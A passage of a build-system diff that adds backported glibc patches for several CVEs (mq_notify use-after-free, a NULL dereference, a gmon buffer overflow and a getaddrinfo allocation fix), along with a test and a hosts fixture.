+@@ -115,6 +115,12 @@ __mpn_extract_long_double (mp_ptr res_pt
+ 	   && res_ptr[N - 1] == 0)
+     /* Pseudo zero.  */
+     *expt = 0;
+-
++  else
++    /* The sign bit is explicit, but add it in case it is missing in
++       the input.  Otherwise, callers will not be able to produce the
++       expected multi-precision integer layout by shifting the sign
++       bit into the MSB.  */
++    res_ptr[N - 1] |= (mp_limb_t) 1 << (LDBL_MANT_DIG - 1
++                   - ((N - 1) * BITS_PER_MP_LIMB));
+   return N;
+ }
diff --git a/meta/recipes-core/glibc/glibc/CVE-2021-33574_1.patch b/meta/recipes-core/glibc/glibc/CVE-2021-33574_1.patch
new file mode 100644
index 0000000000..7561e87121
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/CVE-2021-33574_1.patch
@@ -0,0 +1,68 @@
+From 42d359350510506b87101cf77202fefcbfc790cb Mon Sep 17 00:00:00 2001
+From: Andreas Schwab <schwab@linux-m68k.org>
+Date: Thu, 27 May 2021 12:49:47 +0200
+Subject: [PATCH] Use __pthread_attr_copy in mq_notify (bug 27896)
+
+Make a deep copy of the pthread attribute object to remove a potential
+use-after-free issue.
+
+Upstream-Status: Backport
+CVE: CVE-2021-33574 patch#1
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+diff --git a/NEWS b/NEWS
+index 8a20d3c4e3..be489243ac 100644
+--- a/NEWS
++++ b/NEWS
+@@ -7,6 +7,10 @@ using `glibc' in the "product" field.
+ 
+ Version 2.31.1
+ 
++  CVE-2021-33574: The mq_notify function has a potential use-after-free
++  issue when using a notification type of SIGEV_THREAD and a thread
++  attribute with a non-default affinity mask.
++
+ The following bugs are resolved with this release:
+   [14231] stdio-common tests memory requirements
+   [19519] iconv(1) with -c option hangs on illegal multi-byte sequences
+diff --git a/sysdeps/unix/sysv/linux/mq_notify.c b/sysdeps/unix/sysv/linux/mq_notify.c
+index f288bac477..dd47f0b777 100644
+--- a/sysdeps/unix/sysv/linux/mq_notify.c
++++ b/sysdeps/unix/sysv/linux/mq_notify.c
+@@ -135,8 +135,11 @@ helper_thread (void *arg)
+ 	    (void) __pthread_barrier_wait (&notify_barrier);
+ 	}
+       else if (data.raw[NOTIFY_COOKIE_LEN - 1] == NOTIFY_REMOVED)
+-	/* The only state we keep is the copy of the thread attributes.  */
+-	free (data.attr);
++	{
++	  /* The only state we keep is the copy of the thread attributes.  */
++	  pthread_attr_destroy (data.attr);
++	  free (data.attr);
++	}
+     }
+   return NULL;
+ }
+@@ -257,8 +260,7 @@ mq_notify (mqd_t mqdes, const struct sigevent *notification)
+       if (data.attr == NULL)
+ 	return -1;
+ 
+-      memcpy (data.attr, notification->sigev_notify_attributes,
+-	      sizeof (pthread_attr_t));
++      __pthread_attr_copy (data.attr, notification->sigev_notify_attributes);
+     }
+ 
+   /* Construct the new request.  */
+@@ -272,7 +274,10 @@ mq_notify (mqd_t mqdes, const struct sigevent *notification)
+ 
+   /* If it failed, free the allocated memory.  */
+   if (__glibc_unlikely (retval != 0))
+-    free (data.attr);
++    {
++      pthread_attr_destroy (data.attr);
++      free (data.attr);
++    }
+ 
+   return retval;
+ }
diff --git a/meta/recipes-core/glibc/glibc/CVE-2021-33574_2.patch b/meta/recipes-core/glibc/glibc/CVE-2021-33574_2.patch
new file mode 100644
index 0000000000..396cd7fc0e
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/CVE-2021-33574_2.patch
@@ -0,0 +1,73 @@
+From 217b6dc298156bdb0d6aea9ea93e7e394a5ff091 Mon Sep 17 00:00:00 2001
+From: Florian Weimer <fweimer@redhat.com>
+Date: Tue, 1 Jun 2021 17:51:41 +0200
+Subject: [PATCH] Fix use of __pthread_attr_copy in mq_notify (bug 27896)
+
+__pthread_attr_copy can fail and does not initialize the attribute
+structure in that case.
+
+If __pthread_attr_copy is never called and there is no allocated
+attribute, pthread_attr_destroy should not be called, otherwise
+there is a null pointer dereference in rt/tst-mqueue6.
+
+Fixes commit 42d359350510506b87101cf77202fefcbfc790cb
+("Use __pthread_attr_copy in mq_notify (bug 27896)").
+
+Reviewed-by: Siddhesh Poyarekar <siddhesh@sourceware.org>
+
+https://sourceware.org/bugzilla/attachment.cgi?id=13497
+
+Upstream-Status: Backport
+CVE: CVE-2021-33574 patch#2
+Signed-off-by: Armin Kuster &lt;akuster@mvista.com&gt;
+
+---
+Index: git/sysdeps/unix/sysv/linux/mq_notify.c
+===================================================================
+--- git.orig/sysdeps/unix/sysv/linux/mq_notify.c
++++ git/sysdeps/unix/sysv/linux/mq_notify.c
+@@ -260,7 +260,34 @@ mq_notify (mqd_t mqdes, const struct sig
+       if (data.attr == NULL)
+ 	return -1;
+ 
+-      __pthread_attr_copy (data.attr, notification->sigev_notify_attributes);
++      memcpy (data.attr, notification->sigev_notify_attributes,
++        sizeof (pthread_attr_t));
++
++      struct pthread_attr *source =
++     (struct pthread_attr *) (notification->sigev_notify_attributes);
++      struct pthread_attr *target = (struct pthread_attr *) (data.attr);
++      cpu_set_t *newp;
++      cpu_set_t *cpuset = source->cpuset;
++      size_t cpusetsize = source->cpusetsize;
++
++      /* alloc a new memory for cpuset to avoid use after free */
++      if (cpuset != NULL && cpusetsize > 0)
++   {
++     newp = (cpu_set_t *) malloc (cpusetsize);
++     if (newp == NULL)
++       {
++         free(data.attr);
++         return -1;
++       }
++
++     memcpy (newp, cpuset, cpusetsize);
++     target->cpuset = newp;
++   }
++      else
++   {
++     target->cpuset = NULL;
++     target->cpusetsize = 0;
++   }
+     }
+ 
+   /* Construct the new request.  */
+@@ -273,7 +300,7 @@ mq_notify (mqd_t mqdes, const struct sig
+   int retval = INLINE_SYSCALL (mq_notify, 2, mqdes, &se);
+ 
+   /* If it failed, free the allocated memory.  */
+-  if (__glibc_unlikely (retval != 0))
++   if (retval != 0 && data.attr != NULL)
+     {
+       pthread_attr_destroy (data.attr);
+       free (data.attr);
diff --git a/meta/recipes-core/glibc/glibc/CVE-2021-38604.patch b/meta/recipes-core/glibc/glibc/CVE-2021-38604.patch
new file mode 100644
index 0000000000..36fd4a61b2
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/CVE-2021-38604.patch
@@ -0,0 +1,41 @@
+From b805aebd42364fe696e417808a700fdb9800c9e8 Mon Sep 17 00:00:00 2001
+From: Nikita Popov <npv1310@gmail.com>
+Date: Mon, 9 Aug 2021 20:17:34 +0530
+Subject: [PATCH] librt: fix NULL pointer dereference (bug 28213)
+
+Helper thread frees copied attribute on NOTIFY_REMOVED message
+received from the OS kernel.  Unfortunately, it fails to check whether
+copied attribute actually exists (data.attr != NULL).  This worked
+earlier because free() checks passed pointer before actually
+attempting to release corresponding memory.  But
+__pthread_attr_destroy assumes pointer is not NULL.
+
+So passing NULL pointer to __pthread_attr_destroy will result in
+segmentation fault.  This scenario is possible if
+notification->sigev_notify_attributes == NULL (which means default
+thread attributes should be used).
+
+Signed-off-by: Nikita Popov <npv1310@gmail.com>
+Reviewed-by: Siddhesh Poyarekar <siddhesh@sourceware.org>
+
+Upstream-Status: Backport
+CVE: CVE-2021-38604
+Signed-off-by: Armin Kuser <akuster@mvista.com>
+
+---
+ sysdeps/unix/sysv/linux/mq_notify.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+Index: git/sysdeps/unix/sysv/linux/mq_notify.c
+===================================================================
+--- git.orig/sysdeps/unix/sysv/linux/mq_notify.c
++++ git/sysdeps/unix/sysv/linux/mq_notify.c
+@@ -134,7 +134,7 @@ helper_thread (void *arg)
+ 	       to wait until it is done with it.  */
+ 	    (void) __pthread_barrier_wait (&notify_barrier);
+ 	}
+-      else if (data.raw[NOTIFY_COOKIE_LEN - 1] == NOTIFY_REMOVED)
++      else if (data.raw[NOTIFY_COOKIE_LEN - 1] == NOTIFY_REMOVED && data.attr != NULL)
+ 	{
+ 	  /* The only state we keep is the copy of the thread attributes.  */
+ 	  pthread_attr_destroy (data.attr);
diff --git a/meta/recipes-core/glibc/glibc/CVE-2023-0687.patch b/meta/recipes-core/glibc/glibc/CVE-2023-0687.patch
new file mode 100644
index 0000000000..10c7e5666d
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/CVE-2023-0687.patch
@@ -0,0 +1,82 @@
+From 952aff5c00ad7c6b83c3f310f2643939538827f8 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?=D0=9B=D0=B5=D0=BE=D0=BD=D0=B8=D0=B4=20=D0=AE=D1=80=D1=8C?=
+ =?UTF-8?q?=D0=B5=D0=B2=20=28Leonid=20Yuriev=29?= <leo@yuriev.ru>
+Date: Sat, 4 Feb 2023 14:41:38 +0300
+Subject: [PATCH] gmon: Fix allocated buffer overflow (bug 29444)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The `__monstartup()` allocates a buffer used to store all the data
+accumulated by the monitor.
+
+The size of this buffer depends on the size of the internal structures
+used and the address range for which the monitor is activated, as well
+as on the maximum density of call instructions and/or callable functions
+that could be potentially on a segment of executable code.
+
+In particular a hash table of arcs is placed at the end of this buffer.
+The size of this hash table is calculated in bytes as
+   p->fromssize = p->textsize / HASHFRACTION;
+
+but actually should be
+   p->fromssize = ROUNDUP(p->textsize / HASHFRACTION, sizeof(*p->froms));
+
+This results in writing beyond the end of the allocated buffer when an
+added arc corresponds to a call near from the end of the monitored
+address range, since `_mcount()` check the incoming caller address for
+monitored range but not the intermediate result hash-like index that
+uses to write into the table.
+
+It should be noted that when the results are output to `gmon.out`, the
+table is read to the last element calculated from the allocated size in
+bytes, so the arcs stored outside the buffer boundary did not fall into
+`gprof` for analysis. Thus this "feature" help me to found this bug
+during working with https://sourceware.org/bugzilla/show_bug.cgi?id=29438
+
+Just in case, I will explicitly note that the problem breaks the
+`make test t=gmon/tst-gmon-dso` added for Bug 29438.
+There, the arc of the `f3()` call disappears from the output, since in
+the DSO case, the call to `f3` is located close to the end of the
+monitored range.
+
+Signed-off-by: Леонид Юрьев (Leonid Yuriev) <leo@yuriev.ru>
+
+Another minor error seems a related typo in the calculation of
+`kcountsize`, but since kcounts are smaller than froms, this is
+actually to align the p->froms data.
+
+Co-authored-by: DJ Delorie <dj@redhat.com>
+Reviewed-by: Carlos O'Donell <carlos@redhat.com>
+
+Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=commit;h=801af9fafd4689337ebf27260aa115335a0cb2bc]
+CVE: CVE-2023-0687
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ gmon/gmon.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/gmon/gmon.c b/gmon/gmon.c
+index dee6480..bf76358 100644
+--- a/gmon/gmon.c
++++ b/gmon/gmon.c
+@@ -132,6 +132,8 @@ __monstartup (u_long lowpc, u_long highpc)
+   p->lowpc = ROUNDDOWN(lowpc, HISTFRACTION * sizeof(HISTCOUNTER));
+   p->highpc = ROUNDUP(highpc, HISTFRACTION * sizeof(HISTCOUNTER));
+   p->textsize = p->highpc - p->lowpc;
++  /* This looks like a typo, but it's here to align the p->froms
++     section.  */
+   p->kcountsize = ROUNDUP(p->textsize / HISTFRACTION, sizeof(*p->froms));
+   p->hashfraction = HASHFRACTION;
+   p->log_hashfraction = -1;
+@@ -142,7 +144,7 @@ __monstartup (u_long lowpc, u_long highpc)
+	 instead of integer division.  Precompute shift amount. */
+       p->log_hashfraction = ffs(p->hashfraction * sizeof(*p->froms)) - 1;
+   }
+-  p->fromssize = p->textsize / HASHFRACTION;
++  p->fromssize = ROUNDUP(p->textsize / HASHFRACTION, sizeof(*p->froms));
+   p->tolimit = p->textsize * ARCDENSITY / 100;
+   if (p->tolimit < MINARCS)
+     p->tolimit = MINARCS;
+--
+2.7.4
diff --git a/meta/recipes-core/glibc/glibc/CVE-2023-4813.patch b/meta/recipes-core/glibc/glibc/CVE-2023-4813.patch
new file mode 100644
index 0000000000..c7db4038c2
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/CVE-2023-4813.patch
@@ -0,0 +1,986 @@
+From 1c37b8022e8763fedbb3f79c02e05c6acfe5a215 Mon Sep 17 00:00:00 2001
+From: Siddhesh Poyarekar <siddhesh@sourceware.org>
+Date: Thu, 17 Mar 2022 11:44:34 +0530
+Subject: [PATCH] Simplify allocations and fix merge and continue actions [BZ
+ #28931]
+
+Allocations for address tuples is currently a bit confusing because of
+the pointer chasing through PAT, making it hard to observe the sequence
+in which allocations have been made.  Narrow scope of the pointer
+chasing through PAT so that it is only used where necessary.
+
+This also tightens actions behaviour with the hosts database in
+getaddrinfo to comply with the manual text.  The "continue" action
+discards previous results and the "merge" action results in an immedate
+lookup failure.  Consequently, chaining of allocations across modules is
+no longer necessary, thus opening up cleanup opportunities.
+
+A test has been added that checks some combinations to ensure that they
+work correctly.
+
+Resolves: BZ #28931
+
+CVE: CVE-2023-4813
+Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=1c37b8022e8763fedbb3f79c02e05c6acfe5a215]
+Comments: Hunks refreshed
+
+Signed-off-by: Siddhesh Poyarekar <siddhesh@sourceware.org>
+Reviewed-by: DJ Delorie <dj@redhat.com>
+Signed-off-by: Bhabu Bindu <bhabu.bindu@kpit.com>
+---
+ nss/Makefile                               |   1 +
+ nss/tst-nss-gai-actions.c                  | 149 ++++++
+ nss/tst-nss-gai-actions.root/etc/host.conf |   1 +
+ nss/tst-nss-gai-actions.root/etc/hosts     | 508 +++++++++++++++++++++
+ sysdeps/posix/getaddrinfo.c                | 143 +++---
+ 5 files changed, 750 insertions(+), 52 deletions(-)
+ create mode 100644 nss/tst-nss-gai-actions.c
+ create mode 100644 nss/tst-nss-gai-actions.root/etc/host.conf
+ create mode 100644 nss/tst-nss-gai-actions.root/etc/hosts
+
+diff --git a/nss/Makefile b/nss/Makefile
+index 42a59535cb..d8b06b44fb 100644
+--- a/nss/Makefile
++++ b/nss/Makefile
+@@ -61,6 +61,7 @@
+ 
+ tests-container = \
+ 			  tst-nss-test3 \
++			  tst-nss-gai-actions \
+ 			  tst-nss-files-hosts-long \
+ 			  tst-nss-db-endpwent \
+ 			  tst-nss-db-endgrent
+diff --git a/nss/tst-nss-gai-actions.c b/nss/tst-nss-gai-actions.c
+new file mode 100644
+index 0000000000..efca6cd183
+--- /dev/null
++++ b/nss/tst-nss-gai-actions.c
+@@ -0,0 +1,149 @@
++/* Test continue and merge NSS actions for getaddrinfo.
++   Copyright The GNU Toolchain Authors.
++   This file is part of the GNU C Library.
++
++   The GNU C Library is free software; you can redistribute it and/or
++   modify it under the terms of the GNU Lesser General Public
++   License as published by the Free Software Foundation; either
++   version 2.1 of the License, or (at your option) any later version.
++
++   The GNU C Library is distributed in the hope that it will be useful,
++   but WITHOUT ANY WARRANTY; without even the implied warranty of
++   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
++   Lesser General Public License for more details.
++
++   You should have received a copy of the GNU Lesser General Public
++   License along with the GNU C Library; if not, see
++   <https://www.gnu.org/licenses/>.  */
++
++#include <dlfcn.h>
++#include <gnu/lib-names.h>
++#include <nss.h>
++#include <stdio.h>
++#include <stdlib.h>
++#include <string.h>
++
++#include <support/check.h>
++#include <support/format_nss.h>
++#include <support/support.h>
++#include <support/xstdio.h>
++#include <support/xunistd.h>
++
++enum
++{
++  ACTION_MERGE = 0,
++  ACTION_CONTINUE,
++};
++
++static const char *
++family_str (int family)
++{
++  switch (family)
++    {
++    case AF_UNSPEC:
++      return "AF_UNSPEC";
++    case AF_INET:
++      return "AF_INET";
++    default:
++      __builtin_unreachable ();
++    }
++}
++
++static const char *
++action_str (int action)
++{
++  switch (action)
++    {
++    case ACTION_MERGE:
++      return "merge";
++    case ACTION_CONTINUE:
++      return "continue";
++    default:
++      __builtin_unreachable ();
++    }
++}
++
++static void
++do_one_test (int action, int family, bool canon)
++{
++  struct addrinfo hints =
++    {
++      .ai_family = family,
++    };
++
++  struct addrinfo *ai;
++
++  if (canon)
++    hints.ai_flags = AI_CANONNAME;
++
++  printf ("***** Testing \"files [SUCCESS=%s] files\" for family %s, %s\n",
++	  action_str (action), family_str (family),
++	  canon ? "AI_CANONNAME" : "");
++
++  int ret = getaddrinfo ("example.org", "80", &hints, &ai);
++
++  switch (action)
++    {
++    case ACTION_MERGE:
++      if (ret == 0)
++	{
++	  char *formatted = support_format_addrinfo (ai, ret);
++
++	  printf ("merge unexpectedly succeeded:\n %s\n", formatted);
++	  support_record_failure ();
++	  free (formatted);
++	}
++      else
++	return;
++    case ACTION_CONTINUE:
++	{
++	  char *formatted = support_format_addrinfo (ai, ret);
++
++	  /* Verify that the result appears exactly once.  */
++	  const char *expected = "address: STREAM/TCP 192.0.0.1 80\n"
++	    "address: DGRAM/UDP 192.0.0.1 80\n"
++	    "address: RAW/IP 192.0.0.1 80\n";
++
++	  const char *contains = strstr (formatted, expected);
++	  const char *contains2 = NULL;
++
++	  if (contains != NULL)
++	    contains2 = strstr (contains + strlen (expected), expected);
++
++	  if (contains == NULL || contains2 != NULL)
++	    {
++	      printf ("continue failed:\n%s\n", formatted);
++	      support_record_failure ();
++	    }
++
++	  free (formatted);
++	  break;
++	}
++    default:
++      __builtin_unreachable ();
++    }
++}
++
++static void
++do_one_test_set (int action)
++{
++  char buf[32];
++
++  snprintf (buf, sizeof (buf), "files [SUCCESS=%s] files",
++	    action_str (action));
++  __nss_configure_lookup ("hosts", buf);
++
++  do_one_test (action, AF_UNSPEC, false);
++  do_one_test (action, AF_INET, false);
++  do_one_test (action, AF_INET, true);
++}
++
++static int
++do_test (void)
++{
++  do_one_test_set (ACTION_CONTINUE);
++  do_one_test_set (ACTION_MERGE);
++  return 0;
++}
++
++#include <support/test-driver.c>
+diff --git a/nss/tst-nss-gai-actions.root/etc/host.conf b/nss/tst-nss-gai-actions.root/etc/host.conf
+new file mode 100644
+index 0000000000..d1a59f73a9
+--- /dev/null
++++ b/nss/tst-nss-gai-actions.root/etc/host.conf
+@@ -0,0 +1 @@
++multi on
+diff --git a/nss/tst-nss-gai-actions.root/etc/hosts b/nss/tst-nss-gai-actions.root/etc/hosts
+new file mode 100644
+index 0000000000..50ce9774dc
+--- /dev/null
++++ b/nss/tst-nss-gai-actions.root/etc/hosts
+@@ -0,0 +1,508 @@
++192.0.0.1	example.org
++192.0.0.2	example.org
++192.0.0.3	example.org
++192.0.0.4	example.org
++192.0.0.5	example.org
++192.0.0.6	example.org
++192.0.0.7	example.org
++192.0.0.8	example.org
++192.0.0.9	example.org
++192.0.0.10	example.org
++192.0.0.11	example.org
++192.0.0.12	example.org
++192.0.0.13	example.org
++192.0.0.14	example.org
++192.0.0.15	example.org
++192.0.0.16	example.org
++192.0.0.17	example.org
++192.0.0.18	example.org
++192.0.0.19	example.org
++192.0.0.20	example.org
++192.0.0.21	example.org
++192.0.0.22	example.org
++192.0.0.23	example.org
++192.0.0.24	example.org
++192.0.0.25	example.org
++192.0.0.26	example.org
++192.0.0.27	example.org
++192.0.0.28	example.org
++192.0.0.29	example.org
++192.0.0.30	example.org
++192.0.0.31	example.org
++192.0.0.32	example.org
++192.0.0.33	example.org
++192.0.0.34	example.org
++192.0.0.35	example.org
++192.0.0.36	example.org
++192.0.0.37	example.org
++192.0.0.38	example.org
++192.0.0.39	example.org
++192.0.0.40	example.org
++192.0.0.41	example.org
++192.0.0.42	example.org
++192.0.0.43	example.org
++192.0.0.44	example.org
++192.0.0.45	example.org
++192.0.0.46	example.org
++192.0.0.47	example.org
++192.0.0.48	example.org
++192.0.0.49	example.org
++192.0.0.50	example.org
++192.0.0.51	example.org
++192.0.0.52	example.org
++192.0.0.53	example.org
++192.0.0.54	example.org
++192.0.0.55	example.org
++192.0.0.56	example.org
++192.0.0.57	example.org
++192.0.0.58	example.org
++192.0.0.59	example.org
++192.0.0.60	example.org
++192.0.0.61	example.org
++192.0.0.62	example.org
++192.0.0.63	example.org
++192.0.0.64	example.org
++192.0.0.65	example.org
++192.0.0.66	example.org
++192.0.0.67	example.org
++192.0.0.68	example.org
++192.0.0.69	example.org
++192.0.0.70	example.org
++192.0.0.71	example.org
++192.0.0.72	example.org
++192.0.0.73	example.org
++192.0.0.74	example.org
++192.0.0.75	example.org
++192.0.0.76	example.org
++192.0.0.77	example.org
++192.0.0.78	example.org
++192.0.0.79	example.org
++192.0.0.80	example.org
++192.0.0.81	example.org
++192.0.0.82	example.org
++192.0.0.83	example.org
++192.0.0.84	example.org
++192.0.0.85	example.org
++192.0.0.86	example.org
++192.0.0.87	example.org
++192.0.0.88	example.org
++192.0.0.89	example.org
++192.0.0.90	example.org
++192.0.0.91	example.org
++192.0.0.92	example.org
++192.0.0.93	example.org
++192.0.0.94	example.org
++192.0.0.95	example.org
++192.0.0.96	example.org
++192.0.0.97	example.org
++192.0.0.98	example.org
++192.0.0.99	example.org
++192.0.0.100	example.org
++192.0.0.101	example.org
++192.0.0.102	example.org
++192.0.0.103	example.org
++192.0.0.104	example.org
++192.0.0.105	example.org
++192.0.0.106	example.org
++192.0.0.107	example.org
++192.0.0.108	example.org
++192.0.0.109	example.org
++192.0.0.110	example.org
++192.0.0.111	example.org
++192.0.0.112	example.org
++192.0.0.113	example.org
++192.0.0.114	example.org
++192.0.0.115	example.org
++192.0.0.116	example.org
++192.0.0.117	example.org
++192.0.0.118	example.org
++192.0.0.119	example.org
++192.0.0.120	example.org
++192.0.0.121	example.org
++192.0.0.122	example.org
++192.0.0.123	example.org
++192.0.0.124	example.org
++192.0.0.125	example.org
++192.0.0.126	example.org
++192.0.0.127	example.org
++192.0.0.128	example.org
++192.0.0.129	example.org
++192.0.0.130	example.org
++192.0.0.131	example.org
++192.0.0.132	example.org
++192.0.0.133	example.org
++192.0.0.134	example.org
++192.0.0.135	example.org
++192.0.0.136	example.org
++192.0.0.137	example.org
++192.0.0.138	example.org
++192.0.0.139	example.org
++192.0.0.140	example.org
++192.0.0.141	example.org
++192.0.0.142	example.org
++192.0.0.143	example.org
++192.0.0.144	example.org
++192.0.0.145	example.org
++192.0.0.146	example.org
++192.0.0.147	example.org
++192.0.0.148	example.org
++192.0.0.149	example.org
++192.0.0.150	example.org
++192.0.0.151	example.org
++192.0.0.152	example.org
++192.0.0.153	example.org
++192.0.0.154	example.org
++192.0.0.155	example.org
++192.0.0.156	example.org
++192.0.0.157	example.org
++192.0.0.158	example.org
++192.0.0.159	example.org
++192.0.0.160	example.org
++192.0.0.161	example.org
++192.0.0.162	example.org
++192.0.0.163	example.org
++192.0.0.164	example.org
++192.0.0.165	example.org
++192.0.0.166	example.org
++192.0.0.167	example.org
++192.0.0.168	example.org
++192.0.0.169	example.org
++192.0.0.170	example.org
++192.0.0.171	example.org
++192.0.0.172	example.org
++192.0.0.173	example.org
++192.0.0.174	example.org
++192.0.0.175	example.org
++192.0.0.176	example.org
++192.0.0.177	example.org
++192.0.0.178	example.org
++192.0.0.179	example.org
++192.0.0.180	example.org
++192.0.0.181	example.org
++192.0.0.182	example.org
++192.0.0.183	example.org
++192.0.0.184	example.org
++192.0.0.185	example.org
++192.0.0.186	example.org
++192.0.0.187	example.org
++192.0.0.188	example.org
++192.0.0.189	example.org
++192.0.0.190	example.org
++192.0.0.191	example.org
++192.0.0.192	example.org
++192.0.0.193	example.org
++192.0.0.194	example.org
++192.0.0.195	example.org
++192.0.0.196	example.org
++192.0.0.197	example.org
++192.0.0.198	example.org
++192.0.0.199	example.org
++192.0.0.200	example.org
++192.0.0.201	example.org
++192.0.0.202	example.org
++192.0.0.203	example.org
++192.0.0.204	example.org
++192.0.0.205	example.org
++192.0.0.206	example.org
++192.0.0.207	example.org
++192.0.0.208	example.org
++192.0.0.209	example.org
++192.0.0.210	example.org
++192.0.0.211	example.org
++192.0.0.212	example.org
++192.0.0.213	example.org
++192.0.0.214	example.org
++192.0.0.215	example.org
++192.0.0.216	example.org
++192.0.0.217	example.org
++192.0.0.218	example.org
++192.0.0.219	example.org
++192.0.0.220	example.org
++192.0.0.221	example.org
++192.0.0.222	example.org
++192.0.0.223	example.org
++192.0.0.224	example.org
++192.0.0.225	example.org
++192.0.0.226	example.org
++192.0.0.227	example.org
++192.0.0.228	example.org
++192.0.0.229	example.org
++192.0.0.230	example.org
++192.0.0.231	example.org
++192.0.0.232	example.org
++192.0.0.233	example.org
++192.0.0.234	example.org
++192.0.0.235	example.org
++192.0.0.236	example.org
++192.0.0.237	example.org
++192.0.0.238	example.org
++192.0.0.239	example.org
++192.0.0.240	example.org
++192.0.0.241	example.org
++192.0.0.242	example.org
++192.0.0.243	example.org
++192.0.0.244	example.org
++192.0.0.245	example.org
++192.0.0.246	example.org
++192.0.0.247	example.org
++192.0.0.248	example.org
++192.0.0.249	example.org
++192.0.0.250	example.org
++192.0.0.251	example.org
++192.0.0.252	example.org
++192.0.0.253	example.org
++192.0.0.254	example.org
++192.0.1.1	example.org
++192.0.1.2	example.org
++192.0.1.3	example.org
++192.0.1.4	example.org
++192.0.1.5	example.org
++192.0.1.6	example.org
++192.0.1.7	example.org
++192.0.1.8	example.org
++192.0.1.9	example.org
++192.0.1.10	example.org
++192.0.1.11	example.org
++192.0.1.12	example.org
++192.0.1.13	example.org
++192.0.1.14	example.org
++192.0.1.15	example.org
++192.0.1.16	example.org
++192.0.1.17	example.org
++192.0.1.18	example.org
++192.0.1.19	example.org
++192.0.1.20	example.org
++192.0.1.21	example.org
++192.0.1.22	example.org
++192.0.1.23	example.org
++192.0.1.24	example.org
++192.0.1.25	example.org
++192.0.1.26	example.org
++192.0.1.27	example.org
++192.0.1.28	example.org
++192.0.1.29	example.org
++192.0.1.30	example.org
++192.0.1.31	example.org
++192.0.1.32	example.org
++192.0.1.33	example.org
++192.0.1.34	example.org
++192.0.1.35	example.org
++192.0.1.36	example.org
++192.0.1.37	example.org
++192.0.1.38	example.org
++192.0.1.39	example.org
++192.0.1.40	example.org
++192.0.1.41	example.org
++192.0.1.42	example.org
++192.0.1.43	example.org
++192.0.1.44	example.org
++192.0.1.45	example.org
++192.0.1.46	example.org
++192.0.1.47	example.org
++192.0.1.48	example.org
++192.0.1.49	example.org
++192.0.1.50	example.org
++192.0.1.51	example.org
++192.0.1.52	example.org
++192.0.1.53	example.org
++192.0.1.54	example.org
++192.0.1.55	example.org
++192.0.1.56	example.org
++192.0.1.57	example.org
++192.0.1.58	example.org
++192.0.1.59	example.org
++192.0.1.60	example.org
++192.0.1.61	example.org
++192.0.1.62	example.org
++192.0.1.63	example.org
++192.0.1.64	example.org
++192.0.1.65	example.org
++192.0.1.66	example.org
++192.0.1.67	example.org
++192.0.1.68	example.org
++192.0.1.69	example.org
++192.0.1.70	example.org
++192.0.1.71	example.org
++192.0.1.72	example.org
++192.0.1.73	example.org
++192.0.1.74	example.org
++192.0.1.75	example.org
++192.0.1.76	example.org
++192.0.1.77	example.org
++192.0.1.78	example.org
++192.0.1.79	example.org
++192.0.1.80	example.org
++192.0.1.81	example.org
++192.0.1.82	example.org
++192.0.1.83	example.org
++192.0.1.84	example.org
++192.0.1.85	example.org
++192.0.1.86	example.org
++192.0.1.87	example.org
++192.0.1.88	example.org
++192.0.1.89	example.org
++192.0.1.90	example.org
++192.0.1.91	example.org
++192.0.1.92	example.org
++192.0.1.93	example.org
++192.0.1.94	example.org
++192.0.1.95	example.org
++192.0.1.96	example.org
++192.0.1.97	example.org
++192.0.1.98	example.org
++192.0.1.99	example.org
++192.0.1.100	example.org
++192.0.1.101	example.org
++192.0.1.102	example.org
++192.0.1.103	example.org
++192.0.1.104	example.org
++192.0.1.105	example.org
++192.0.1.106	example.org
++192.0.1.107	example.org
++192.0.1.108	example.org
++192.0.1.109	example.org
++192.0.1.110	example.org
++192.0.1.111	example.org
++192.0.1.112	example.org
++192.0.1.113	example.org
++192.0.1.114	example.org
++192.0.1.115	example.org
++192.0.1.116	example.org
++192.0.1.117	example.org
++192.0.1.118	example.org
++192.0.1.119	example.org
++192.0.1.120	example.org
++192.0.1.121	example.org
++192.0.1.122	example.org
++192.0.1.123	example.org
++192.0.1.124	example.org
++192.0.1.125	example.org
++192.0.1.126	example.org
++192.0.1.127	example.org
++192.0.1.128	example.org
++192.0.1.129	example.org
++192.0.1.130	example.org
++192.0.1.131	example.org
++192.0.1.132	example.org
++192.0.1.133	example.org
++192.0.1.134	example.org
++192.0.1.135	example.org
++192.0.1.136	example.org
++192.0.1.137	example.org
++192.0.1.138	example.org
++192.0.1.139	example.org
++192.0.1.140	example.org
++192.0.1.141	example.org
++192.0.1.142	example.org
++192.0.1.143	example.org
++192.0.1.144	example.org
++192.0.1.145	example.org
++192.0.1.146	example.org
++192.0.1.147	example.org
++192.0.1.148	example.org
++192.0.1.149	example.org
++192.0.1.150	example.org
++192.0.1.151	example.org
++192.0.1.152	example.org
++192.0.1.153	example.org
++192.0.1.154	example.org
++192.0.1.155	example.org
++192.0.1.156	example.org
++192.0.1.157	example.org
++192.0.1.158	example.org
++192.0.1.159	example.org
++192.0.1.160	example.org
++192.0.1.161	example.org
++192.0.1.162	example.org
++192.0.1.163	example.org
++192.0.1.164	example.org
++192.0.1.165	example.org
++192.0.1.166	example.org
++192.0.1.167	example.org
++192.0.1.168	example.org
++192.0.1.169	example.org
++192.0.1.170	example.org
++192.0.1.171	example.org
++192.0.1.172	example.org
++192.0.1.173	example.org
++192.0.1.174	example.org
++192.0.1.175	example.org
++192.0.1.176	example.org
++192.0.1.177	example.org
++192.0.1.178	example.org
++192.0.1.179	example.org
++192.0.1.180	example.org
++192.0.1.181	example.org
++192.0.1.182	example.org
++192.0.1.183	example.org
++192.0.1.184	example.org
++192.0.1.185	example.org
++192.0.1.186	example.org
++192.0.1.187	example.org
++192.0.1.188	example.org
++192.0.1.189	example.org
